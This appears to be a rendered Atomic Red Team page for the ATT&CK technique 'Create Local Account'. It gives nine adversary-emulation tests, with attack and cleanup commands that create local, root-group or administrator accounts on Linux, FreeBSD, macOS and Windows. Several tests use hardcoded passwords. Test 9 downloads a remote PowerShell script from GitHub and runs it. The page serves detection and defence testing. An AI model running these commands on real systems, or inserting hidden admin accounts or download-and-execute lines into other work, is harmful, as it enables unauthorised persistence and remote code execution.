T1136.001 - Create Account: Local Account

Description from ATT&CK

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Atomic Tests


Atomic Test #1 - Create a user account on a Linux system

Create a user via useradd

Supported Platforms: Linux

auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user|

Attack Commands: Run with
1
bash
! Elevation Required (e.g. root or admin)

1
useradd -M -N -r -s /bin/bash -c evil_account #{username}

Cleanup Commands:

1
userdel #{username}



Atomic Test #2 - Create a user account on a FreeBSD system

Create a user via pw

Supported Platforms: Linux

auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account

Cleanup Commands:

1
rmuser -y #{username}



Atomic Test #3 - Create a user account on a MacOS system

Creates a user on a MacOS system with dscl

Supported Platforms: macOS

auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user| | realname | ‘realname’ to record when creating the user | string | Evil Account|

Attack Commands: Run with
1
bash
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}

Cleanup Commands:

1
dscl . -delete /Users/#{username}



Atomic Test #4 - Create a new user in a command prompt

Creates a new user in a command prompt. Upon execution, “The command completed successfully.” will be displayed. To verify the new account, run “net user” in powershell or CMD and observe that there is a new user named “T1136.001_CMD”

Supported Platforms: Windows

auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_CMD| | password | Password of the user to create | string | T1136.001_CMD!|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

net user /add "#{username}" "#{password}"

Cleanup Commands:

net user /del "#{username}" >nul 2>&1



Atomic Test #5 - Create a new user in PowerShell

Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run “net user” in powershell or CMD and observe that there is a new user named “T1136.001_PowerShell”

Supported Platforms: Windows

auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_PowerShell|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
New-LocalUser -Name "#{username}" -NoPassword

Cleanup Commands:

1
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore



Atomic Test #6 - Create a new user in Linux with
1
root
UID and GID.

Creates a new user in Linux and adds the user to the

1
root
group. This technique was used by adversaries during the Butter attack campaign.

Supported Platforms: Linux

auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | butter| | password | Password of the user to create | string | BetterWithButter|

Attack Commands: Run with
1
bash
! Elevation Required (e.g. root or admin)

1
2
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;

Cleanup Commands:

1
userdel #{username}



Atomic Test #7 - Create a new user in FreeBSD with
1
root
GID.

Creates a new user in FreeBSD and adds the user to the

1
root
group. This technique was used by adversaries during the Butter attack campaign.

Supported Platforms: Linux

auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | butter| | password | Password of the user to create | string | BetterWithButter|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
2
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0

Cleanup Commands:

1
pw userdel #{username}



Atomic Test #8 - Create a new Windows admin user

Creates a new admin user in a command prompt.

Supported Platforms: Windows

auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_Admin| | password | Password of the user to create | string | T1136_pass|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add

Cleanup Commands:

net user /del "#{username}" >nul 2>&1



Atomic Test #9 - Create a new Windows admin user via .NET

Creates a new admin user in a powershell session without using net.exe

Supported Platforms: Windows

auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')